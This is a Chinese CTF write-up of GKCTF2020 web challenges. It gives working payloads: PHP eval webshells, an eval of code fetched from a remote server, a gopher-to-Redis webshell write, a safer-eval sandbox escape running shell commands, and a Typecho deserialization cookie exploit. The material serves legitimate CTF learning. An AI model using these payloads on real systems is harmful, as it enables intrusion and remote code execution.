web1 签到
1
| http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==
|
得到phpinfo,ban了一堆命令执行函数,但没有open_basedir,没有ban readfile等
1
| http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=dmFyX2R1bXAoc2NhbmRpcigiLyIpKTs=
|
得到flag需要执行/readflag
PHP Version 7.3.18,上nday一把梭
/var/www/html没有写入权限,把nday放到远程服务器上,fopen远程服务器拿到字符串,eval之
1
| eval(file_get_contents("http://6073-48b235c6-49f5-454c-a672-92d70e856fc7/web1help.html"));
|
但是nday用这种方式跑不通,不知道为什么,用传统的tmp写shell包含
或者转换一下shell用菜刀连
然后写payload到/tmp下去包含
1
2
| http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1JFUVVFU1RbJ2EnXSk7
#连接密码a
|
1
| http://8dddfa42-d1cc-4d4a-adb7-77b140dfa3af.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSAiL3RtcC9leHBsb2l0LnBocCI7
|
同一个bug,换了一个nday跑通了,事实证明realworld pwn都是玄学
1
| https://www.exploit-db.com/exploits/47462
|
web2 cve签到
随便访问个什么,http回复头里提示Tips: Host must be end with '123'
1
| http://ee6116c9-9cae-4ed4-9c08-2e15f6b87783.node3.buuoj.cn/?url=http://127.0.0.123%00.ctfhub.com
|
就直接出了?
web3 老八商城
存在log泄露
/runtime/log/202005/16.log
登录路径是admin.php,用户名和密码百度可以搜到
http://www.nctry.com/1660.html
1
| http://47d464c1-87d8-4b05-b2cf-d83b1a2147d6.node3.buuoj.cn/public/static/index/default/try.php
|
getshell,发现flag无权限访问,存在root权限的后门服务,修改之用来读取flag。
web几 EzWeb
注释给提示?secret,加了参数给了一个ifconfig输出
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <!--?secret-->
eth0 Link encap:Ethernet HWaddr 02:42:ad:16:a7:0a
inet addr:173.22.167.10 Bcast:173.22.167.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1
RX packets:39 errors:0 dropped:0 overruns:0 frame:0
TX packets:62 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6552 (6.5 KB) TX bytes:7566 (7.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:40 errors:0 dropped:0 overruns:0 frame:0
TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2440 (2.4 KB) TX bytes:2440 (2.4 KB)
|
1
2
| http://cc7700d7-2f14-4b29-833a-cd5eecd0b071.node3.buuoj.cn/index.php?url=173.22.167.10&submit=%E6%8F%90%E4%BA%A4
http://cc7700d7-2f14-4b29-833a-cd5eecd0b071.node3.buuoj.cn/index.php?url=127.2.3.3&submit=%E6%8F%90%E4%BA%A4
|
得到了本页面的代码,说明是ssrf
根据结果后面那个1 和请求特征 判断是关闭了user-agent的curl
1
| http://c89decb9-9a57-4af9-b951-40ee25b93c59.node3.buuoj.cn/index.php?url=file%3A%2Fetc%2Fpasswd&submit=%E6%8F%90%E4%BA%A4
|
可以访问/etc/passwd,但是curl本身好像就读不了/proc里的东西,本地测试也不行
读/var/www/html/index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
}
if(isset($_GET['submit'])){
$url = $_GET['url'];
if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
{
die('别这样');
}
curl($url);
}
if(isset($_GET['secret'])){
system('ifconfig');
}
?>
|
fuzz出来是.11的6379 redis,/etc/hosts也没有提示,逗我呢?
.11上还有web服务器,redis写php webshell
1
2
| gopher://173.22.167.11:6379/%5f%25%32%41%31%25%30%44%25%30%41%25%32%34%38%25%30%44%25%30%41%66%6c%75%73%68%61%6c%6c%25%30%44%25%30%41%25%32%41%33%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%25%30%44%25%30%41%31%25%30%44%25%30%41%25%32%34%33%30%25%30%44%25%30%41%25%30%41%25%30%41%25%33%43%25%33%46%70%68%70%25%32%30%25%34%30%65%76%61%6c%25%32%38%25%32%34%5f%47%45%54%25%35%42%25%32%37%62%25%32%37%25%35%44%25%32%39%25%33%42%25%33%46%25%33%45%25%30%41%25%30%41%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%64%69%72%25%30%44%25%30%41%25%32%34%31%33%25%30%44%25%30%41%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%30%25%30%44%25%30%41%64%62%66%69%6c%65%6e%61%6d%65%25%30%44%25%30%41%25%32%34%39%25%30%44%25%30%41%73%68%65%6c%6c%2e%70%68%70%25%30%44%25%30%41%25%32%41%31%25%30%44%25%30%41%25%32%34%34%25%30%44%25%30%41%73%61%76%65%25%30%44%25%30%41%25%30%41
#密码是b
|
1
| http://c89decb9-9a57-4af9-b951-40ee25b93c59.node3.buuoj.cn/index.php?url=173.22.167.11%2Fshell.php%3Fb%3Dreadfile%28%22%2Fflag%22%29%3B&submit=%E6%8F%90%E4%BA%A4
|
web几 EzNode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
| const express = require('express');
const bodyParser = require('body-parser');
const saferEval = require('safer-eval');
const fs = require('fs');
const app = express();
app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());
app.use((req, res, next) => {
if (req.path === '/eval') {
let delay = 60 * 1000;
console.log(delay);
if (Number.isInteger(parseInt(req.query.delay))) {
delay = Math.max(delay, parseInt(req.query.delay));
}
const t = setTimeout(() => next(), delay);
setTimeout(() => {
clearTimeout(t);
console.log('timeout');
try {
res.send('Timeout!');
} catch (e) {
}
}, 1000);
} else {
next();
}
});
app.post('/eval', function (req, res) {
let response = '';
if (req.body.e) {
try {
response = saferEval(req.body.e);
} catch (e) {
response = 'Wrong Wrong Wrong!!!!';
}
}
res.send(String(response));
});
app.get('/source', function (req, res) {
res.set('Content-Type', 'text/javascript;charset=utf-8');
res.send(fs.readFileSync('./index.js'));
});
app.get('/version', function (req, res) {
res.set('Content-Type', 'text/json;charset=utf-8');
res.send(fs.readFileSync('./package.json'));
});
app.get('/', function (req, res) {
res.set('Content-Type', 'text/html;charset=utf-8');
res.send(fs.readFileSync('./index.html'))
})
app.listen(80, '0.0.0.0', () => {
console.log('Start listening')
});
{
"name": "src",
"version": "1.0.0",
"main": "index.js",
"license": "MIT",
"dependencies": {
"body-parser": "1.19.0",
"express": "4.17.1",
"safer-eval": "1.3.6"
}
}
|
https://snyk.io/vuln/SNYK-JS-SAFEREVAL-534901
https://stackoverflow.com/questions/3468607/why-does-settimeout-break-for-large-millisecond-delay-values
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| POST http://5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn/eval?delay=2147483648 HTTP/1.1
Host: 5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn
Connection: keep-alive
Content-Length: 751
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn
Referer: http://5ec967ff-4c31-4c81-b3d0-2990ea2e10e1.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
X-Forwarded-For: 172.25.0.11
e=(function+()+%7B%0A++const+f+%3D+Buffer.prototype.write%3B%0A++const+ft+%3D+%7B%0A++++length%3A+10%2C%0A++++utf8Write()%7B%0A%0A++++%7D%0A++%7D%3B%0A++function+r(i)%7B%0A++++var+x+%3D+0%3B%0A++++try%7B%0A++++++x+%3D+r(i)%3B%0A++++%7Dcatch(e)%7B%7D%0A++++if(typeof(x)!%3D%3D'number')%0A++++++return+x%3B%0A++++if(x!%3D%3Di)%0A++++++return+x%2B1%3B%0A++++try%7B%0A++++++f.call(ft)%3B%0A++++%7Dcatch(e)%7B%0A++++++return+e%3B%0A++++%7D%0A++++return+null%3B%0A++%7D%0A++var+i%3D1%3B%0A++while(1)%7B%0A++++try%7B%0A++++++i%3Dr(i).constructor.constructor(%22return+process%22)()%3B%0A++++++break%3B%0A++++%7Dcatch(x)%7B%0A++++++i%2B%2B%3B%0A++++%7D%0A++%7D%0A++return+i.mainModule.require(%22child_process%22).execSync(%22cat /flag%22).toString()%0A%7D)()
|
一把梭,爷就喜欢nday题
Web几 Node-Exe
安装包和etcher的差不多,直接可以解压
对resources/下的app.asar进行解包
https://stackoverflow.com/questions/38523617/how-to-unpack-an-asar-file
1
2
3
4
5
6
| npm install -g asar
#或 cnpm install -g asar #取决于哪个更快
#解包
npx asar extract app.asar app
#打包
asar pack app app.asar
|
在合适的位置添加打开调试工具窗体.openDevTools();
打包,触发自己的代码,触发调试工具
应该就是关于token和timestamp怎么计算的
下xhr断点
可以看见调用栈
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
| methods: {
encrypt: function(e, i, t) {
var o = this;
return c()(a.a.mark((function n() {
return a.a.wrap((function(o) {
for (; ; )
switch (o.prev = o.next) {
case 0:
return o.abrupt("return", new s.a((function(o) {
var n = p.a.createCipheriv("aes-128-cbc", e, i)
, r = n.update(t, "utf8", "binary");
r += n.final("binary"),
o(r = new Buffer.from(r,"binary").toString("hex"))
}
)));
case 1:
case "end":
return o.stop()
}
}
), n, o)
}
)))()
},
makeToken: function(e) {
var i = this;
return c()(a.a.mark((function t() {
var o, r;
return a.a.wrap((function(t) {
for (; ; )
switch (t.prev = t.next) {
case 0:
return "31169fedc9a20ecf",
"d96adeefaa0102a9",
o = f()(n()(e)),
t.next = 5,
i.encrypt("31169fedc9a20ecf", "d96adeefaa0102a9", o);
case 5:
return r = t.sent,
t.abrupt("return", r);
case 7:
case "end":
return t.stop()
}
}
), t, i)
}
)))()
},
buyFlag: function(e) {
var i = this;
return c()(a.a.mark((function t() {
var o;
return a.a.wrap((function(t) {
for (; ; )
switch (t.prev = t.next) {
case 0:
return o = {
id: e,
timestamp: Date.parse(new Date)
},
t.t0 = i.$http,
t.t1 = i.url + "/buyflag",
t.t2 = o,
t.next = 6,
i.makeToken(o);
case 6:
t.t3 = t.sent,
t.t4 = {
token: t.t3
},
t.t5 = {
headers: t.t4
},
t.t6 = function(e) {
i.$Modal.info({
title: "购买结果",
content: e.data[0].flag
})
}
,
t.t0.post.call(t.t0, t.t1, t.t2, t.t5).then(t.t6);
case 11:
case "end":
return t.stop()
}
}
), t, i)
}
|
chrome调试工具里的pprint js只能下断点不能编辑,有时间戳在XHR下断点来不及修改,在且只在buyFlag处下断点把flag类型改成3,得到不能购买的提示
把flag类型改成字符串3||1即可
所以这算啥,sql注入?弱类型?parseInt忽略附加内容?
Web几 EzTypeEcho
https://www.freebuf.com/vuls/152058.html
install里取消了session_start
原先在finish处的反序列化加了判断,需要SESSION存在才能通过
但是在start处也存在同样的反序列化,并且没有加判断,上面网址里的payload一把梭。
1
2
3
4
5
6
7
8
9
10
11
| GET http://b1a5c30b-558e-4a73-84ed-0fa196e689a2.node3.buuoj.cn/install.php?start HTTP/1.1
Host: b1a5c30b-558e-4a73-84ed-0fa196e689a2.node3.buuoj.cn
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=77o478sbht9as7ibcof6v2nqu0; __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE3OiJyZWFkZmlsZSgiL2ZsYWciKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE3OiJyZWFkZmlsZSgiL2ZsYWciKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=; __typecho_lang=zh_CN
Referer: http://b1a5c30b-558e-4a73-84ed-0fa196e689a2.node3.buuoj.cn/install.php?
|
[GKCTF2020]问卷调查
[GKCTF2020]签到
由于Valine存在安全问题,我们不会记录您的IP地址。您所填入的内容,和您的User-Agent信息将明文公开存储。